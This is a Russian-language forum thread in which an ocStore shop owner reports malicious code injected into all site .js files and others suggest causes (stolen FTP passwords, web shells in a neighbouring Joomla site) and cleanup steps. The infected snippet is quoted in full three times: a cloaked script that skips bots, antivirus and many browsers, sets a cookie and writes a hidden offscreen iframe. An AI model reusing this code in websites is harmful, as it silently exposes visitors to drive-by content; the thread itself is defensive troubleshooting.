Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

[Решено? {joomla}] Взлом магазина *.js


colaweb

Recommended Posts

Здравствуйте, борюсь второй день. Ищу дырку в ocStore 1.5.4.1.2 через которую злоумышленник добавляет во все файлы с расширением .js в папке catalog/view/javascript/

 

вот этот код:

//beleiad9
(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function zzz_check_ua(){
var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0|Firefox/21.0|Firefox/22.0|Firefox/23.0|Firefox/24.0|Maxthon|YandexNews|bingbot|YandexAntivirus|Chromium|Googlebot|Wget|YandexBot|Googlebot-Image|msnbot-media|SymbianOS|Mini|YandexDirect|MRSPUTNIK';
blackList = blackList.split('|');
var blackUA = false;
for (var i in blackList) {
if (stripos(navigator.userAgent, blackList[i])!==false) {
blackUA = true;
break;
}
}
return blackUA;
}
function setCookie(name, value, expires) {
var date = new Date( new Date().getTime() + expires*1000 );
document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" ));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!zzz_check_ua()) {
var cookie = getCookie('nirajo819fyau82');
if (cookie == undefined) {
setCookie('nirajo819fyau82', true, 86400);
document.write('<iframe src="http://search.yahoo.com" style="position:absolute;left:-900px;top:-900px;" height="110" width="110"></iframe>');
}
};
})();
//kolamne817

Может кто то уже сталкивался с подобной проблемой, поделитесь пожалуйста, откуда ноги растут.

 

магазин http://colaweb.ru/honey/

Надіслати
Поділитися на інших сайтах

На другой cms была такая проблема - во ВСЕ js-файлы (в самый конец) добавлялся, скажем так, некий код (не обязательно как у вас). Выяснилось: дыра FTP (а потому не храните пароли в клиентах). Лечение: либо чистка всех js-файлов, либо их замена + ОБЯЗАТЕЛЬНАЯ смена FTP-доступов (логин - пароль).

Надіслати
Поділитися на інших сайтах


Здравствуйте, борюсь второй день. Ищу дырку в ocStore 1.5.4.1.2 через которую злоумышленник добавляет во все файлы с расширением .js в папке catalog/view/javascript/

 

вот этот код:


Может кто то уже сталкивался с подобной проблемой, поделитесь пожалуйста, откуда ноги растут.

 

магазин http://colaweb.ru/honey/

на вашем аккаунте случайно нет сайтов на джумле или дле?  Если есть, то ищите дыры там

Надіслати
Поділитися на інших сайтах

 

на вашем аккаунте случайно нет сайтов на джумле или дле? Если есть, то ищите дыры там

Не факт. Описанная выше проблема у меня произошла на open slaed. Причину я указал.

Надіслати
Поділитися на інших сайтах


Не факт. Описанная выше проблема у меня произошла на open slaed. Причину я указал.

 я бы мог конечно назвать и другие CMS , но боюсь , что не хватит места на форуме.. просто привел пример.. :-)

Надіслати
Поділитися на інших сайтах

Так ведь дело-то не в cms, а в способе и пути проникновения вредоносного кода, ну и "чистоте" своего компьютера, конечно же  :wink:

Надіслати
Поділитися на інших сайтах


1. Почистил все файлы *.js

2. Поменял все пароли

 

"Дырку" та и не нашел, посмотрю что завтра будет.

 

Не помогло. Опять во все *.js дописался вначале вредоносный код 

 

В файле ошибок появились записи:

2013-10-14 20:18:51 - PHP Warning:  fopen(/home/c/cl39380/colaweb/public_html/honey/download/test) [<a href='function.fopen'>function.fopen</a>]: failed to open stream: Permission denied in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 99
2013-10-14 20:18:51 - PHP Warning:  fclose(): supplied argument is not a valid stream resource in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 103
2013-10-14 20:18:51 - PHP Warning:  sprintf() [<a href='function.sprintf'>function.sprintf</a>]: Too few arguments in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 106
2013-10-14 20:44:55 - PHP Warning:  fopen(/home/c/cl39380/colaweb/public_html/honey/download/test) [<a href='function.fopen'>function.fopen</a>]: failed to open stream: Permission denied in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 99
2013-10-14 20:44:55 - PHP Warning:  fclose(): supplied argument is not a valid stream resource in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 103
2013-10-14 20:44:55 - PHP Warning:  sprintf() [<a href='function.sprintf'>function.sprintf</a>]: Too few arguments in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 106
2013-10-14 20:50:12 - PHP Warning:  fopen(/home/c/cl39380/colaweb/public_html/honey/download/test) [<a href='function.fopen'>function.fopen</a>]: failed to open stream: Permission denied in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 99
2013-10-14 20:50:12 - PHP Warning:  fclose(): supplied argument is not a valid stream resource in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 103
2013-10-14 20:50:12 - PHP Warning:  sprintf() [<a href='function.sprintf'>function.sprintf</a>]: Too few arguments in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 106

Что делать?

Надіслати
Поділитися на інших сайтах

вот тут colaweb/public_html/honey/download/ посмотрите... лишнего ничего нет в папке?

в крайнем случае обратитесь к хостеру... нормальный хостер подскажет от куда ноги растут

Надіслати
Поділитися на інших сайтах

  • 2 weeks later...

Здравствуйте, борюсь второй день. Ищу дырку в ocStore 1.5.4.1.2 через которую злоумышленник добавляет во все файлы с расширением .js в папке catalog/view/javascript/

 

вот этот код:

//beleiad9
(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function zzz_check_ua(){
var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0|Firefox/21.0|Firefox/22.0|Firefox/23.0|Firefox/24.0|Maxthon|YandexNews|bingbot|YandexAntivirus|Chromium|Googlebot|Wget|YandexBot|Googlebot-Image|msnbot-media|SymbianOS|Mini|YandexDirect|MRSPUTNIK';
blackList = blackList.split('|');
var blackUA = false;
for (var i in blackList) {
if (stripos(navigator.userAgent, blackList[i])!==false) {
blackUA = true;
break;
}
}
return blackUA;
}
function setCookie(name, value, expires) {
var date = new Date( new Date().getTime() + expires*1000 );
document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" ));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!zzz_check_ua()) {
var cookie = getCookie('nirajo819fyau82');
if (cookie == undefined) {
setCookie('nirajo819fyau82', true, 86400);
document.write('<iframe src="http://search.yahoo.com" style="position:absolute;left:-900px;top:-900px;" height="110" width="110"></iframe>');
}
};
})();
//kolamne817
Может кто то уже сталкивался с подобной проблемой, поделитесь пожалуйста, откуда ноги растут.

 

магазин http://colaweb.ru/honey/

У меня тоже была такая проблема. В аккаунте 8 сайтов, и все js файлы были заражены этим кодом. В сайтах все, что было связано с jquery, перестало работать. Разумеется, что удаление вреданосного кода бесполезно, потому что через 10 мин. код самостоятельно восстановливается. Я тоже долго искал дыру во всех сайтах аккаунта и нашел в папке "Images" сайта erevan-online.ru. Там в файле .htaccess я обнаружил обсалютный путь к файлу пароля моего аккаунта. Я заменил этот код на вот такой:

 

<Files ~ "\.(php|cgi|pl|php3|php4|php5|php6|phps|phtml|shtml|py)$">

Deny from all

</Files>

Order allow,deny

Deny from all

 

Потом сменил пароль FTP аккаунта. А что произашло после этого, я не понял... В js файлах всех сайтов тот код, который я цитировал больше не было, они исчезали самостоятельно. Кто-то может обяснить как это произошло? Спасибо всем

Змінено користувачем afwollis
unlinked
Надіслати
Поділитися на інших сайтах


Надіслати
Поділитися на інших сайтах


Смотрите в папку download, не завалялся ли там шелл, у меня недавно мультимагазин со всеми вытекающими так был заражен, все js-ки инфицированы, и всё из-за дыры в TinyMCE в джумле, что на соседнем домене и том же хосте стояла, грохнули и тишина.

Надіслати
Поділитися на інших сайтах

Смотрите в папку download, не завалялся ли там шелл, у меня недавно мультимагазин со всеми вытекающими так был заражен, все js-ки инфицированы, и всё из-за дыры в TinyMCE в джумле, что на соседнем домене и том же хосте стояла, грохнули и тишина.

 

Шеллы сидели в Joomle.

 

Почистил все файлы .php где был код с 

eval(..

Пока все тихо, ищу "дырку"

.

Надіслати
Поділитися на інших сайтах

Шеллы сидели в Joomle.

 

Почистил все файлы .php где был код с 

eval(..

Пока все тихо, ищу "дырку"

.

вот об этом я вам и писал ранее... а дырку ищите в правах доступа к файлам и папкам... и сделайте дополнительную авторизацию для админки на уровне сервера...

Надіслати
Поділитися на інших сайтах

ТС скрипт который вы использовали ищет самое популярное из вредоносных кодов (говорю по опыту), проблема в следующий раз просто усложниться. Постарайтесь глазами пройтись по коду вашего сайта. Так же хотел обратить внимание, что и хостинг играет большую роль, точнее его натсройка, как выше говорили вам указать права на папки и файлы - это может не помочь, если не будут правильно выставлены настройки сервера их просто будут менять на те, котоыре нужны злоумшлинику.

Надіслати
Поділитися на інших сайтах


  • 1 month later...

Тоже попалась эта зараза. Действовал так:

  • удалил вредоносный код из всех .js
  • в access_log поискал все, что содержит "js", среди результатов внимание привлекли запросы POST с именем файла 6a442.php
  • поискал по всем файлам на сервере по содержимому вышеуказанного php, поиск дал еще 95 файлов с таким же содержимым в разных папках joomla
  • удалил все найденные php
Надіслати
Поділитися на інших сайтах


  • 2 months later...

В общем, вышеуказонный метод помогает, но ненадолго. Через неделю-другую вредоносный код появляется снова. Зараженные файлы лечу снова, но видимо вирус где-то остается недочищенным. У кого какие идеи, как дочистить супостата?

Надіслати
Поділитися на інших сайтах


  • 2 weeks later...

Идей много, вплоть до анализа логов доступа.

Вам нужно лечить? или заниматься самолечением?

Надіслати
Поділитися на інших сайтах

  • 1 month later...

Здравствуйте, борюсь второй день. Ищу дырку в ocStore 1.5.4.1.2 через которую злоумышленник добавляет во все файлы с расширением .js в папке catalog/view/javascript/

 

вот этот код:

//beleiad9
(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function zzz_check_ua(){
var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0|Firefox/21.0|Firefox/22.0|Firefox/23.0|Firefox/24.0|Maxthon|YandexNews|bingbot|YandexAntivirus|Chromium|Googlebot|Wget|YandexBot|Googlebot-Image|msnbot-media|SymbianOS|Mini|YandexDirect|MRSPUTNIK';
blackList = blackList.split('|');
var blackUA = false;
for (var i in blackList) {
if (stripos(navigator.userAgent, blackList[i])!==false) {
blackUA = true;
break;
}
}
return blackUA;
}
function setCookie(name, value, expires) {
var date = new Date( new Date().getTime() + expires*1000 );
document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" ));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!zzz_check_ua()) {
var cookie = getCookie('nirajo819fyau82');
if (cookie == undefined) {
setCookie('nirajo819fyau82', true, 86400);
document.write('<iframe src="http://search.yahoo.com" style="position:absolute;left:-900px;top:-900px;" height="110" width="110"></iframe>');
}
};
})();
//kolamne817

Может кто то уже сталкивался с подобной проблемой, поделитесь пожалуйста, откуда ноги растут.

 

магазин http://colaweb.ru/honey/

 

Может это поможет? Вирусдай (писал обзор тут).

Надіслати
Поділитися на інших сайтах


Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку

×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.